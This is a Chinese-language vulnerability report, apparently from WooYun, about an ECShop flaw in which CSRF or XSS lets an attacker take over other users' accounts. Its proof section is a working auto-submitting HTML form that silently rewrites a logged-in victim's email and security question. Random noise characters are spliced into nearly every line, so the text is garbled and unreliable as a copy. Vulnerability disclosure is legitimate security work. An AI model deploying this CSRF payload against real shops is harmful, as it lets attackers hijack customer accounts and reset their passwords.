简要描述:7 n$ D, @! l7 i2 M+ k+ Z M
ecshop在设计认证机制的时候存在一个问题,导致恶意用户可以窃取其他用户的密码,这个过程可以通过xss和csrf实现5 c9 e) U1 z: ?5 K' k
7 k8 K- |, S: KDemo For:http://www.wooyun.org/bug.php?action=view&id=395
* G/ L5 i5 x2 W- d4 G8 m' {' Z" ]5 [% U6 E
详细说明:( i3 q/ V$ U2 Q8 M
利用csrf和xss可以突破官方所说的“障碍”
; F0 D/ V! v$ @' Hxss版本已经有人说明/ p/ h, b3 r# e/ d* G4 S+ {( R' }
这里给出csrf版本
* X, R! x2 q: `* X9 x! |7 ~! c. V" {. G; H3 X8 ?" m, V1 i# t
漏洞证明:
b1 @/ R$ r0 F9 X<html>
( C- a6 R# X2 P' s* A3 q$ q U8 g<body>
( j: w/ G2 j7 o A<form action="http://www.wooyun.org/ecshop/user.php" method="POST">' E7 P/ z( p9 F6 g& T0 {3 L; u: W; \
<INPUT TYPE="text" NAME="email" value="hack@wooyun.org">
K7 F: D/ @- f# r7 z4 m<INPUT TYPE="text" NAME="act" value="act_edit_profile">
2 }1 \) ?+ S' v) D% W<INPUT TYPE="text" NAME="sel_question" value="ecshop">$ a$ B/ Y5 R ^9 a. A
<INPUT TYPE="text" NAME="passwd_answer" value="exploit">. L5 S" R% j+ ~9 k" `& u3 G
</body>
7 Z6 ?6 I& ?; g3 R<script>
( Q9 K- Y/ z3 j. B, \' W$ wdocument.forms[0].submit();/ ^; v* O. {7 U/ @+ f9 _# y% q* H
</script>7 A$ L7 [$ v, V* Y6 H- a
</html>6 [( U' w5 n0 B1 Z) \
构造该网页,用户在登录情况下访问该网页将导致email以及一些其他安全信息丢失 B0 S# n2 c" ^6 A) d% X
7 Z% l6 R1 [! U3 r8 A |